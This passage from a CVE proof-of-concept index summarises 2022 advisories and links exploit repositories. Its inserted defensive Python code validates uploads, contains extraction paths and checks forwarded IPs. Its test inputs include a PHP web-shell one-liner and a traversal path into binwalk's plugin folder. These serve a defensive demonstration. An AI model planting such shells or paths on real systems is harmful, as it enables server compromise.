A vulnerability was found in SourceCodester Sanitization Management System and classified as problematic. This issue affects some unknown processing of the file php-sms/?p=request_quote. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-213449 was assigned to this vulnerability.

- [maikroservice/CVE-2022-3942](https://github.com/maikroservice/CVE-2022-3942)

### CVE-2022-3949 (2022-11-11)

A vulnerability, which was classified as problematic, has been found in Sourcecodester Simple Cashiering System. This issue affects some unknown processing of the component User Account Handler. The manipulation of the argument fullname leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-213455.

- [maikroservice/CVE-2022-3949](https://github.com/maikroservice/CVE-2022-3949)

### CVE-2022-3992 (2022-11-14)

A vulnerability classified as problematic was found in SourceCodester Sanitization Management System. Affected by this vulnerability is an unknown functionality of the file admin/?page=system_info of the component Banner Image Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-213571.

- [Urban4/CVE-2022-3992](https://github.com/Urban4/CVE-2022-3992)

### CVE-2022-4047 (2022-12-26)

The Return Refund and Exchange For WooCommerce WordPress plugin before 4.0.9 does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE

- [im-hanzou/WooRefer](https://github.com/im-hanzou/WooRefer)
- [entroychang/CVE-2022-4047](https://github.com/entroychang/CVE-2022-4047)

### CVE-2022-4060 (2023-01-16)

The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible for any visitor to run code on sites running it.

- [im-hanzou/UPGer](https://github.com/im-hanzou/UPGer)

### CVE-2022-4061 (2022-12-19)

The JobBoardWP WordPress plugin before 1.2.2 does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.

- [im-hanzou/JBWPer](https://github.com/im-hanzou/JBWPer)

### CVE-2022-4063 (2022-12-19)

The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files & URLs, which may enable them to run code on servers.

- [im-hanzou/INPGer](https://github.com/im-hanzou/INPGer)

### CVE-2022-4096 (2022-11-21)

Server-Side Request Forgery (SSRF) in GitHub repository appsmithorg/appsmith prior to 1.8.2.

- [aminetitrofine/CVE-2022-4096](https://github.com/aminetitrofine/CVE-2022-4096)

### CVE-2022-4262 (2022-12-02)

Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [bjrjk/CVE-2022-4262](https://github.com/bjrjk/CVE-2022-4262)
- [mistymntncop/CVE-2022-4262](https://github.com/mistymntncop/CVE-2022-4262)
- [quangnh89/CVE-2022-4262](https://github.com/quangnh89/CVE-2022-4262)

### CVE-2022-4304 (2023-02-08)

A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OAEP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.

- [Trinadh465/Openssl-1.1.1g_CVE-2022-4304](https://github.com/Trinadh465/Openssl-1.1.1g_CVE-2022-4304)

### CVE-2022-4395 (2023-01-30)

The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

- [MrG3P5/CVE-2022-4395](https://github.com/MrG3P5/CVE-2022-4395)
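
The three upload advisories above (CVE-2022-4047, CVE-2022-4061 and CVE-2022-4395) describe the same defect: an AJAX upload reachable without a session that stores whatever file name and content it receives. The following is an added example, not code from any of those plugins or from the listed repositories, of the checks an upload handler should apply before writing anything: a login requirement, an extension allow-list that also rejects executable tokens anywhere in the name (so `shell.php.jpg` fails), a magic-byte check on the content, and a server-chosen random file name. The allowed-type table, the executable-token set and the size limit are assumptions chosen for the demo.

```python
import posixpath
import secrets
from typing import Dict, Optional, Tuple

# Allowed upload types and the leading bytes each must start with (assumption:
# the site only needs images and PDFs).
ALLOWED_TYPES: Dict[str, Tuple[bytes, ...]] = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Extension tokens a web server might hand to an interpreter or treat as
# configuration. Rejected wherever they appear in the name, so that
# "shell.php.jpg" does not pass an allow-list that only looks at the last token.
EXECUTABLE_TOKENS = {
    "php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps",
    "htaccess", "cgi", "pl", "py", "sh", "jsp", "asp", "aspx",
}
MAX_BYTES = 5 * 1024 * 1024


def validate_upload(filename: str, content: bytes,
                    is_authenticated: bool) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, stored_name).

    stored_name is a random, server-chosen name: the client's file name never
    reaches the disk, so neither traversal nor a crafted name selects the target.
    """
    if not is_authenticated:
        # The advisories' AJAX actions answered unauthenticated requests; an
        # upload endpoint needs a logged-in user (and, in WordPress, a nonce).
        return False, "authentication required", None
    if len(content) > MAX_BYTES:
        return False, "file too large", None

    # Keep only the last path component, for either separator style.
    name = posixpath.basename(filename.replace("\\", "/")).lower()
    tokens = name.split(".")
    if len(tokens) < 2 or not tokens[0]:
        return False, "dotfiles and names without an extension are rejected", None
    ext = tokens[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not allowed", None
    if any(tok in EXECUTABLE_TOKENS for tok in tokens[1:]):
        return False, "executable extension token in name", None
    # The bytes must agree with the claimed type; a PHP file renamed .jpg fails here.
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content does not look like .{ext}", None

    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored_name


if __name__ == "__main__":
    # Constructed inputs: a real-looking JPEG header, and a PHP payload under two names.
    print(validate_upload("cat.jpg", b"\xff\xd8\xff\xe0" + bytes(16), True))
    print(validate_upload("shell.php", b"<?php system($_GET['c']); ?>", True))
    print(validate_upload("shell.php.jpg", b"\xff\xd8\xff" + bytes(8), True))
```

A file that passes all of these checks can still carry PHP inside an image comment, so the upload directory must additionally be served with script execution disabled (or sit outside the web root); the validation above removes the easy paths, it does not replace that configuration.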

### CVE-2022-4510 (2023-01-25)

A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins. This vulnerability is associated with program files src/binwalk/plugins/unpfs.py. This issue affects binwalk from 2.1.2b through 2.3.3 included.

- [electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510)
- [adhikara13/CVE-2022-4510-WalkingPath](https://github.com/adhikara13/CVE-2022-4510-WalkingPath)
- [Kalagious/BadPfs-CVE-2022-4510](https://github.com/Kalagious/BadPfs-CVE-2022-4510)
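
The containment check an extractor needs before writing a member, as an added example that is not binwalk's code and not from the listed repositories. Member names are treated as POSIX paths, which is what a PFS image carries; the directory listing below is constructed for the demo and includes the plugin-drop pattern the advisory describes.

```python
import posixpath
from typing import Dict, List, Optional, Tuple


def contained_target(dest_dir: str, member_name: str) -> Optional[str]:
    """Absolute path to write `member_name` under `dest_dir`, or None if it would escape."""
    dest = posixpath.normpath(dest_dir)
    prefix = dest if dest.endswith("/") else dest + "/"
    # An absolute member name would make join() discard dest_dir entirely.
    if member_name.startswith("/"):
        return None
    # Collapse "." and ".." segments, then require the result to lie strictly
    # below dest (a name that normalises to dest itself is not a file to write).
    target = posixpath.normpath(posixpath.join(dest, member_name))
    if not target.startswith(prefix):
        return None
    return target


# Constructed PFS directory listing (name -> size) as an extractor would see it
# after parsing the image header. The third entry climbs out of the extraction
# directory towards the binwalk plugin folder; the fourth is absolute.
CONSTRUCTED_PFS_ENTRIES: Dict[str, int] = {
    "bin/busybox": 819200,
    "etc/passwd": 120,
    "www/../../../../.config/binwalk/plugins/evil.py": 640,
    "/etc/shadow": 90,
}


def plan_extraction(dest_dir: str, entries: Dict[str, int]) -> Tuple[Dict[str, str], List[str]]:
    """Split entries into {name: target_path} to extract and a list of rejected names."""
    accepted: Dict[str, str] = {}
    rejected: List[str] = []
    for name in entries:
        target = contained_target(dest_dir, name)
        if target is None:
            rejected.append(name)
        else:
            accepted[name] = target
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = plan_extraction("/tmp/_fw.bin.extracted", CONSTRUCTED_PFS_ENTRIES)
    for name, path in ok.items():
        print("extract", name, "->", path)
    for name in bad:
        print("reject ", name)
```

This check is purely lexical. It does not see symlinks already on disk, so an extractor that also writes symlink entries must refuse links pointing outside the destination (or resolve the final path with `os.path.realpath` at write time and re-check it), otherwise an earlier `www -> /etc` entry turns a contained `www/passwd` into a write to `/etc/passwd`.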

### CVE-2022-4539 (2024-08-31)

The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.

- [Abdurahmon3236/CVE-2022-4539](https://github.com/Abdurahmon3236/CVE-2022-4539)
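
The two ways of deriving a client address described above, as an added example that is not the plugin's code and not from the listed repository: the vulnerable form takes the leftmost `X-Forwarded-For` value from any sender, the hardened form uses the header only when the TCP peer is a known proxy and then reads it from the right, skipping trusted hops. The trusted-proxy range and the deny-list are assumptions constructed for the demo.

```python
import ipaddress
from typing import Dict, List

# Assumption for the demo: the application sits behind one reverse-proxy tier,
# and only these source addresses are allowed to speak for clients.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed deny-list standing in for the plugin's blocked-IP setting.
BLOCKED_CLIENTS = [ipaddress.ip_network("198.51.100.0/24")]


def _in_any(ip: str, nets: List) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in nets)


def client_ip_vulnerable(remote_addr: str, headers: Dict[str, str]) -> str:
    """Leftmost X-Forwarded-For value from anyone: the sender picks what gets logged and checked."""
    first = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    return first or remote_addr


def client_ip_hardened(remote_addr: str, headers: Dict[str, str],
                       trusted=TRUSTED_PROXIES) -> str:
    """Honour the header only from a trusted proxy, and take the rightmost hop that
    is not itself a trusted proxy. Proxies append, so the right end is the part
    written by the last hop we actually trust."""
    if not _in_any(remote_addr, trusted):
        return remote_addr  # direct connection: whatever it put in the header is noise
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _in_any(hop, trusted):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            raise ValueError("malformed X-Forwarded-For relayed by trusted proxy")
        return hop
    return remote_addr  # every hop was a proxy; the peer address is the best we have


def login_allowed(remote_addr: str, headers: Dict[str, str], hardened: bool) -> bool:
    """Apply the deny-list to whichever client-address derivation is in use."""
    try:
        ip = (client_ip_hardened(remote_addr, headers) if hardened
              else client_ip_vulnerable(remote_addr, headers))
    except ValueError:
        return False  # refuse rather than guess when the chain is malformed
    return not _in_any(ip, BLOCKED_CLIENTS)


if __name__ == "__main__":
    # Constructed request: a blocked client connects directly and claims another address.
    spoof = {"X-Forwarded-For": "203.0.113.5"}
    print("vulnerable allows login:", login_allowed("198.51.100.20", spoof, hardened=False))
    print("hardened allows login:  ", login_allowed("198.51.100.20", spoof, hardened=True))
```

The same bug shows up in logging: the vulnerable derivation records `203.0.113.5` for a request that came from `198.51.100.20`, so a block list built from those logs bans the wrong address.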

### CVE-2022-4543 (2023-01-11)

A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.

- [sunichi/cve-2022-4543-wrapper](https://github.com/sunichi/cve-2022-4543-wrapper)

### CVE-2022-4611 (2022-12-19)

A vulnerability classified as problematic was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. An unknown part of the code is affected. Manipulation with unknown input leads to a hard-coded credentials vulnerability. The attack can be carried out over the network. The exploit is publicly available. Applying an upgrade is the recommended countermeasure.

- [Phamchie/CVE-2022-4611](https://github.com/Phamchie/CVE-2022-4611)
- [fgsoftware1/CVE-2022-4611](https://github.com/fgsoftware1/CVE-2022-4611)

### CVE-2022-4616 (2023-01-12)

The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to command injection through the network diagnosis page. This vulnerability could allow a remote unauthenticated user to add files, delete files, and change file permissions.

- [ahanel13/CVE-2022-4616-POC](https://github.com/ahanel13/CVE-2022-4616-POC)

### CVE-2022-4896 (2023-09-12)

Cyber Control, in its 1.650 version, is affected by a vulnerability in the generation on the server of pop-up windows with the messages "PNTMEDIDAS", "PEDIR", "HAYDISCOA" or "SPOOLER". A complete denial of service can be achieved by sending multiple requests simultaneously on a core.

- [sapellaniz/CVE-2022-4896](https://github.com/sapellaniz/CVE-2022-4896)

### CVE-2022-4939 (2023-04-05)

The WCFM Membership plugin for WordPress is vulnerable to privilege escalation in versions up to, and including 2.10.0, due to a missing capability check on the wp_ajax_nopriv_wcfm_ajax_controller AJAX action that controls membership settings. This makes it possible for unauthenticated attackers to modify the membership registration form in a way that allows them to set the role for registration to that of any user including administrators. Once configured, the attacker can then register as an administrator.

- [BaconCriCRi/PoC-CVE-2022-4939-](https://github.com/BaconCriCRi/PoC-CVE-2022-4939-)

### CVE-2022-4944 (2023-04-22)

A vulnerability classified as problematic was discovered in kalcaddle KodExplorer up to 4.49. An unknown part of the code is affected. Manipulation with unknown input leads to a cross-site request forgery vulnerability. The attack can be carried out over the network. The exploit is publicly available. Upgrading to version 4.50 addresses this issue; applying the upgrade is the recommended countermeasure.

- [brosck/CVE-2022-4944](https://github.com/brosck/CVE-2022-4944)

### CVE-2022-5561
- [Kvi74/CVE-2022-5561](https://github.com/Kvi74/CVE-2022-5561)

### CVE-2022-8475
- [Kvi74/CVE-2022-8475](https://github.com/Kvi74/CVE-2022-8475)

### CVE-2022-10270
- [baimaobg/sunflower_exp](https://github.com/baimaobg/sunflower_exp)

### CVE-2022-14733
- [hkzck/CVE-2022-14733](https://github.com/hkzck/CVE-2022-14733)

### CVE-2022-20004 (2022-05-10)

In checkSlicePermission of SliceManagerService.java, it is possible to access any slice URI due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-179699767.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004)

### CVE-2022-20005 (2022-05-10)

In validateApkInstallLocked of PackageInstallerSession.java, there is a way to force a mismatch between running code and a parsed APK. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-219044664.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005)

### CVE-2022-20007 (2022-05-10)

In startActivityForAttachedApplicationIfNeeded of RootWindowContainer.java, there is a possible way to overlay an app that believes it's still in the foreground, when it is not, due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-211481342.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007)
- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007)

### CVE-2022-20009 (2022-05-10)

In various functions of the USB gadget subsystem, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-213172319. References: Upstream kernel.

- [szymonh/android-gadget](https://github.com/szymonh/android-gadget)

### CVE-2022-20126 (2022-06-15)

In setScanMode of AdapterService.java, there is a possible way to enable Bluetooth discovery mode without user interaction due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-203431023.

- [Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126](https://github.com/Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126)

### CVE-2022-20128
- [irsl/CVE-2022-20128](https://github.com/irsl/CVE-2022-20128)

### CVE-2022-20130 (2022-06-15)

In transportDec_OutOfBandConfig of tpdec_lib.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-224314979.

- [Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130](https://github.com/Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130)

### CVE-2022-20138 (2022-06-15)

In ACTION_MANAGED_PROFILE_PROVISIONED of DevicePolicyManagerService.java, there is a possible way for an unprivileged app to send the MANAGED_PROFILE_PROVISIONED intent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-210469972.

- [ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/ShaikUsaf/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20138)

### CVE-2022-20140 (2022-06-15)

In read_multi_rsp of gatt_sr.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-12, Android-12L. Android ID: A-227618988.

- [RenukaSelvar/system_bt_aosp10_cve-2022-20140](https://github.com/RenukaSelvar/system_bt_aosp10_cve-2022-20140)

### CVE-2022-20142 (2022-06-15)

In createFromParcel of GeofenceHardwareRequestParcelable.java, there is a possible arbitrary code execution due to parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-216631962.

- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2022-20142)
- [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142)

### CVE-2022-20186 (2022-06-15)

In kbase_mem_alias of mali_kbase_mem_linux.c, there is a possible arbitrary code execution due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-215001024. References: N/A.

- [Bariskizilkaya/CVE-2022-20186_CTXZ](https://github.com/Bariskizilkaya/CVE-2022-20186_CTXZ)
- [SmileTabLabo/CVE-2022-20186](https://github.com/SmileTabLabo/CVE-2022-20186)

### CVE-2022-20223 (2022-07-13)

In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-223578534.

- [xbee9/cve-2022-20223](https://github.com/xbee9/cve-2022-20223)

### CVE-2022-20224 (2022-07-13)

In AT_SKIP_REST of bta_hf_client_at.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure in the Bluetooth stack with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-220732646.

- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20224)
- [hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224](https://github.com/hshivhare67/platform_system_bt_AOSP10_r33_CVE-2022-20224)

### CVE-2022-20229 (2022-07-13)

In bta_hf_client_handle_cind_list_item of bta_hf_client_at.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-224536184.

- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2022-20229)

### CVE-2022-20338 (2022-08-11)

In HierarchicalUri.readFrom of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to a local escalation of privilege, preventing processes from validating URIs correctly, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-12, Android-12L. Android ID: A-171966843.

- [Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338](https://github.com/Satheesh575555/frameworks_base_AOSP_06_r22_CVE-2022-20338)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20338)
- [Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338](https://github.com/Trinadh465/frameworks_base_AOSP_10_r33_CVE-2022-20338)

### CVE-2022-20347 (2022-08-09)

In onAttach of ConnectedDeviceDashboardFragment.java, there is a possible permission bypass due to a confused deputy. This could lead to remote escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-228450811.

- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347)
- [hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/hshivhare67/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347)

### CVE-2022-20360 (2022-08-09)

In setChecked of SecureNfcPreferenceController.java, there is a missing permission check. This could lead to local escalation of privilege from the guest user with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-228314987.

- [726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360](https://github.com/726232111/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)

### CVE-2022-20361 (2022-08-09)

In btif_dm_auth_cmpl_evt of btif_dm.cc, there is a possible vulnerability in Cross-Transport Key Derivation due to Weakness in Bluetooth Standard. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L. Android ID: A-231161832.

- [francozappa/blur](https://github.com/francozappa/blur)

### CVE-2022-20409 (2022-10-11)

In io_identity_cow of io_uring.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-238177383. References: Upstream kernel.

- [Markakd/bad_io_uring](https://github.com/Markakd/bad_io_uring)

### CVE-2022-20413 (2022-10-11)

In start of Threads.cpp, there is a possible way to record audio during a phone call due to a logic error in the code. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-235850634.

- [pazhanivel07/frameworks_av-r33_CVE-2022-20413](https://github.com/pazhanivel07/frameworks_av-r33_CVE-2022-20413)

### CVE-2022-20421 (2022-10-11)

In binder_inc_ref_for_node of binder.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-239630375. References: Upstream kernel.

- [0xkol/badspin](https://github.com/0xkol/badspin)

### CVE-2022-20452 (2022-11-08)

In initializeFromParcelLocked of BaseBundle.java, there is a possible method arbitrary code execution due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-13. Android ID: A-240138318.

- [michalbednarski/LeakValue](https://github.com/michalbednarski/LeakValue)

### CVE-2022-20456 (2023-01-24)

In AutomaticZenRule of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-242703780.

- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20456)

### CVE-2022-20470 (2022-12-13)

In bindRemoteViewsService of AppWidgetServiceImpl.java, there is a possible way to bypass background activity launch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-234013191.

- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470)

### CVE-2022-20473 (2022-12-13)

In toLanguageTag of LocaleListCache.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-239267173.

- [Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33_CVE-2022-20473)
- [Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473)

### CVE-2022-20489 (2023-01-24)

In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-242703460.

- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old)
- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20489)

### CVE-2022-20490 (2023-01-24)

In multiple functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-242703505.

- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20490)

### CVE-2022-20492 (2023-01-24)

In many functions of AutomaticZenRule.java, there is a possible failure to persist permissions settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-242704043.

- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2022-20492)

### CVE-2022-20493 (2023-01-24)

In Condition of Condition.java, there is a possible way to grant notification access due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-242846316.

- [Trinadh465/frameworks_base_CVE-2022-20493](https://github.com/Trinadh465/frameworks_base_CVE-2022-20493)

### CVE-2022-20494 (2023-01-24)

In AutomaticZenRule of AutomaticZenRule.java, there is a possible persistent DoS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-12, Android-12L, Android-13. Android ID: A-243794204.

- [Supersonic/CVE-2022-20494](https://github.com/Supersonic/CVE-2022-20494)

### CVE-2022-20607 (2022-12-16)

In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-238914868. References: N/A.

- [sumeetIT/CVE-2022-20607](https://github.com/sumeetIT/CVE-2022-20607)

### CVE-2022-20699 (2022-02-10)

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code, elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory.

- [Audiobahn/CVE-2022-20699](https://github.com/Audiobahn/CVE-2022-20699)
- [puckiestyle/CVE-2022-20699](https://github.com/puckiestyle/CVE-2022-20699)
